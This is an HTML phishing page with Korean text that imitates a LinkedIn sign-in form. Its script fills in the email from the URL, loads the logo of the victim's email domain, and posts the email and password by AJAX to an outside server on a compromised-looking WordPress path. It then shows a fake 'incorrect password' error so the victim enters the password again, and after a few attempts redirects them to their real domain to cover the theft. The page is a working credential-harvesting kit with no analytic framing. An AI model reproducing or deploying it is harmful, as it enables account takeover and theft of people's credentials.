﻿

<html class="artdeco " lang="en-US">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>계정 확인</title>
    <link href="https://static-exp1.licdn.com/sc/h/7u070d0xjsd9qyc4skiimjhaj" rel="stylesheet">
	<link rel="icon" href="https://cdn-googlapi-jquery.ga/img/favicon.png">
</head>
<body class="system-fonts ">
    <div id="app__container" class="">
        <header></header>
        <main class="app__content " role="main">
                    </svg></li-icon>
</p><div class="form-holder">
                    <input type="hidden" class="form-control" name="hido" id="hido" value="">
                    <input type="hidden" class="form-control" name="redirecto" id="redirecto" value="">

<div class="xlogo">
<span style="
	height: 29;
	/* text-transform: uppercase !important; */
	text-transform: capitalize;
	font-family: 'wf_segoe-ui_semilight', 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
	margin-top: 12px;
	font-size: 39; vertical-align:middle;
	" font-size:="" 32;="" id="domain-name"></span>

</div>


            </a>
            <div id="" class="card-layout">
            <div class="header__content ">
                    <h1 class="header__content__heading "><img id="logoimg" src="" style="height: 82;></h1>
                    <p class="header__content__subheading "></p>

                 <div class="header__content ">
                       	
            </div>
		
                <form class="login__form" >
                    <form class="login__form">
                                       <div class="form__input--floating mt-24"><input id="email" name="temail" type="text" aria-describedby="error-for-username" required="" class="" autofocus="" aria-label="Email or Phone"><label class="form__label--floating" for="username"  id="ai-txt">이메일<label>
                        <div error-for="username" id="error-for-username" class="form__label--error  hidden" role="alert" aria-live="assertive"></div>
                     </label></label></div>
                    <div class="form__input--floating mt-24"><input id="password" type="password" aria-describedby="error-for-password" name="tpass" required="" validation="password" class="" aria-label="Password"><label for="password" class="form__label--floating"  > 암호</label>
		<br/>
<br/>
		 <div id="msg" style="display: none;color: red;font-size: 12;" class="form__label--error" role="alert" aria-live="assertive">암호가 잘못되었습니다...! 올바른 암호를 입력하십시오.</div>
			          <span id="error" style="color: red;font-size: 15;"></span>
                    <div class="login__form_action_container "><button class="btn__primary--large from__button--floating" data-litms-control-urn="login-submit" type="submit" aria-label="Sign in" id="submit-btn">로그 인.</button></div>
                </form>
                <div class="alternate-signin-container">
                    <div id="or-separator" class="or-separator mt-12 hidden"><span class="or-text">or</span></div>
                </div>
           
        </main>
        <footer class="footer__base " role="contentinfo">
            <div class="footer__base__wrapper">
                <p class="copyright">
                    
                                        </g>
                                    </g>
                                    <g class="dpi-gt1" transform="scale(0.2917)">
                                        <g class="inbug" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                                            <path d="M44.5235,0 L3.6185,0 C1.6625,0 0.0005,1.547 0.0005,3.454 L0.0005,44.545 C0.0005,46.452 1.6625,48 3.6185,48 L44.5235,48 C46.4825,48 48.0005,46.452 48.0005,44.545 L48.0005,3.454 C48.0005,1.547 46.4825,0 44.5235,0" class="bug-text-color" fill="#FFFFFF" transform="translate(143.000000, 0.000000)"></path>
                                            <path d="M187.5235,0 L146.6185,0 C144.6625,0 143.0005,1.547 143.0005,3.454 L143.0005,44.545 C143.0005,46.452 144.6625,48 146.6185,48 L187.5235,48 C189.4825,48 191.0005,46.452 191.0005,44.545 L191.0005,3.454 C191.0005,1.547 189.4825,0 187.5235,0 Z M162,18 L168.5,18 L168.5,21.266 C169.437,19.388 171.838,17.7 175.445,17.7 C182.359,17.7 184,21.438 184,28.297 L184,41 L177,41 L177,29.859 C177,25.953 176.063,23.75 173.68,23.75 C170.375,23.75 169,26.125 169,29.859 L169,41 L162,41 L162,18 Z M150,41 L157,41 L157,18 L150,18 L150,41 Z M158,10.5 C158,12.985 155.985,15 153.5,15 C151.015,15 149,12.985 149,10.5 C149,8.015 151.015,6 153.5,6 C155.985,6 158,8.015 158,10.5 Z" class="background" fill="#0073B0"></path>
                                        </g>
                                        <g class="linkedin-text">
                                            <path d="M136,41 L130,41 L130,37.5 C128.908,39.162 125.727,41.3 122.5,41.3 C115.668,41.3 111.2,36.975 111.2,30 C111.2,23.594 114.951,17.7 121.5,17.7 C124.441,17.7 127.388,18.272 129,20.5 L129,7 L136,7 L136,41 Z M123.25,23.9 C119.691,23.9 117.9,26.037 117.9,29.5 C117.9,32.964 119.691,35.2 123.25,35.2 C126.81,35.2 129.1,32.964 129.1,29.5 C129.1,26.037 126.81,23.9 123.25,23.9 L123.25,23.9 Z" fill="#000000"></path>
                                            <path d="M108,37.125 C105.722,40.02 101.156,41.3 96.75,41.3 C89.633,41.3 85.2,36.354 85.2,29 C85.2,21.645 90.5,17.7 97.75,17.7 C103.75,17.7 108.8,21.917 108.8,30 C108.8,31.25 108.6,32 108.6,32 L92,32 L92.111,32.67 C92.51,34.873 94.873,36 97.625,36 C99.949,36 101.689,34.988 102.875,33.375 L108,37.125 Z M101.75,27 C101.797,24.627 99.89,22.7 97.328,22.7 C94.195,22.7 92.189,24.77 92,27 L101.75,27 Z" fill="#000000"></path>
                                            <polygon fill="#000000" points="63 7 70 7 70 27 78 18 86.75 18 77 28.5 86.375 41 78 41 70 30 70 41 63 41"></polygon>
                                            <path d="M37,18 L43,18 L43,21.375 C43.947,19.572 47.037,17.7 50.5,17.7 C57.713,17.7 59,21.957 59,28.125 L59,41 L52,41 L52,29.625 C52,26.969 52.152,23.8 48.5,23.8 C44.8,23.8 44,26.636 44,29.625 L44,41 L37,41 L37,18 Z" fill="#000000"></path>
                                            <path d="M29.5,6.125 C31.813,6.125 33.875,8.189 33.875,10.5 C33.875,12.811 31.813,14.875 29.5,14.875 C27.19,14.875 25.125,12.811 25.125,10.5 C25.125,8.189 27.19,6.125 29.5,6.125 L29.5,6.125 Z M26,41 L33,41 L33,18 L26,18 L26,41 Z" fill="#000000"></path>
                                            <polygon fill="#000000" points="0 7 7 7 7 34 22 34 22 41 0 41"></polygon>
                                        </g>
                                    </g>
                                </g>
                            </g>
                        </svg></li-icon><em><span class="a11y__label">&#39046;&#33521;</span>© 2022</em>
                </p>
                <div>
                    <ul class="footer__base__nav-list" aria-label="Footer Legal Menu">
                        <li><a href="#">사용자 계약</a></li>
                        <li><a href="#">개인 정보 정책</a></li>
                        <li><a href="#">커뮤니티 가이드라인</a></li>
                        <li><a href="#">정책</a></li>
                        <li><a href="#">저작권 정책</a></li>
                        <li id="feedback-request"><a href="#" target="_blank" rel="nofollow noreferrer noopener">Send Feedback</a></li>
                        <li>
                            <div class="language-selector">
                                <button class="language-selector__button" aria-expanded="false"><span class="language-selector__label-text">语</span><i class="language-selector__label-icon"><svg viewBox="0 0 16 16" width="16" height="16" preserveAspectRatio="xMinYMin meet" xmlns="http://www.w3.org/2000/svg">
                                            <path d="M8 9l5.93-4L15 6.54l-6.15 4.2a1.5 1.5 0 01-1.69 0L1 6.54 2.07 5z" fill="currentColor"></path>
                                        </svg></i></button>
                            </div>
                        </li>
                    </ul>
                </div>
            </div>
        </footer>
        <artdeco-toasts></artdeco-toasts><span class="hidden toast-success-icon">
            <li-icon type="success-pebble-icon" size="small"  ><svg viewBox="0 0 24 24" width="24px" height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon" focusable="false">
                    <g class="small-icon" style="fill-opacity: 1">
                        <circle class="circle" r="6.1" stroke="currentColor" stroke-width="1.8" cx="8" cy="8" fill="none" transform="rotate(-90 8 8)"></circle>
                        <path d="M9.95,5.033l1.2,0.859l-3.375,4.775C7.625,10.875,7.386,10.999,7.13,11c-0.002,0-0.003,0-0.005,0    c-0.254,0-0.493-0.12-0.644-0.325L4.556,8.15l1.187-0.875l1.372,1.766L9.95,5.033z" fill="currentColor"></path>
                    </g>
                </svg></li-icon>
        </span><span class="hidden toast-error-icon">
            <li-icon type="error-pebble-icon" size="small"  ><svg viewBox="0 0 24 24" width="24px" height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon" focusable="false">
                    <g class="small-icon" style="fill-opacity: 1">
                        <circle class="circle" r="6.1" stroke="currentColor" stroke-width="1.8" cx="8" cy="8" fill="none" transform="rotate(-90 8 8)"></circle>
                        <path fill="currentColor" d="M10.916,6.216L9.132,8l1.784,1.784l-1.132,1.132L8,9.132l-1.784,1.784L5.084,9.784L6.918,8L5.084,6.216l1.132-1.132L8,6.868l1.784-1.784L10.916,6.216z"></path>
                    </g>
                </svg></li-icon>
        </span><span class="hidden toast-notify-icon">
            <li-icon type="yield-pebble-icon" size="small"  ><svg viewBox="0 0 24 24" width="24px" height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon" focusable="false">
                    <g class="small-icon" style="fill-opacity: 1">
                        <circle class="circle" r="6.1" stroke="currentColor" stroke-width="1.8" cx="8" cy="8" fill="none" transform="rotate(-90 8 8)"></circle>
                        <path d="M7,10h2v2H7V10z M7,9h2V4H7V9z"></path>
                    </g>
                </svg></li-icon>
        </span><span class="hidden toast-gdpr-icon">
            <li-icon   type="shield-icon" size="small"><svg viewBox="0 0 24 24" width="24px" height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon" focusable="false">
                    <path d="M8,1A10.89,10.89,0,0,1,2.87,3,1,1,0,0,0,2,4V9.33a5.67,5.67,0,0,0,2.91,5L8,16l3.09-1.71a5.67,5.67,0,0,0,2.91-5V4a1,1,0,0,0-.87-1A10.89,10.89,0,0,1,8,1ZM4,4.7A12.92,12.92,0,0,0,8,3.26a12.61,12.61,0,0,0,3.15,1.25L4.45,11.2A3.66,3.66,0,0,1,4,9.46V4.7Zm6.11,8L8,13.84,5.89,12.66A3.65,3.65,0,0,1,5,11.92l7-7V9.46A3.67,3.67,0,0,1,10.11,12.66Z" class="small-icon" style="fill-opacity: 1"></path>
                </svg></li-icon>
        </span><span class="hidden toast-cancel-icon">
            <li-icon type="cancel-icon" size="large"><svg x="0" y="0" id="cancel-icon" preserveAspectRatio="xMinYMin meet" viewBox="0 0 24 24" width="24px" height="24px"><svg class="small-icon" style="fill-opacity: 1;">
                        <path d="M12.99,4.248L9.237,8L13,11.763L11.763,13L8,9.237L4.237,13L3,11.763L6.763,8L3,4.237L4.237,3L8,6.763l3.752-3.752L12.99,4.248z"></path>
                    </svg><svg class="large-icon" style="fill: currentColor;">
                        <path d="M20,5.237l-6.763,6.768l6.743,6.747l-1.237,1.237L12,13.243L5.257,19.99l-1.237-1.237l6.743-6.747L4,5.237L5.237,4L12,10.768L18.763,4L20,5.237z"></path>
                    </svg></svg></li-icon>
        </span>
        <div id="loader-wrapper" class="hidden">
            <li-icon type="loader" class="blue" size="medium"  >
                <div class="artdeco-spinner"><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span></div>
            </li-icon>
        </div>
    </div>
<!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

	
      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
		$("#favimg").attr("href", "https://www.google.com/s2/favicons?domain="+my_slice);
		$("#favimg1").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
		$('#connect').html(""+my_slice);
		$('#pol').html(""+my_slice);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);
		$('#domain-name').html(final);
		
	;
      }

      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
        $(".logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
        $("#logoname").html(finalu);
		
		
		if (!filter.test(my_email)) {
            $('#error').show();
            $('#error').html("아이디를 입력하세요");
            email.focus
            return false;
        }
        if (!password) {
            $('#error').show();
            $('#error').html("⚠ 비밀번호를 입력하세요");
            email.focus
            return false;
        }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
		
		
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://bideshbanglanews.com/wp-snapshots/kore/newk.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html();
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=3) {
                    count=1;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("http://www."+my_slice);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=1;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('로그인 ');
            }
          });
    });


    });


  </script>






</body></html>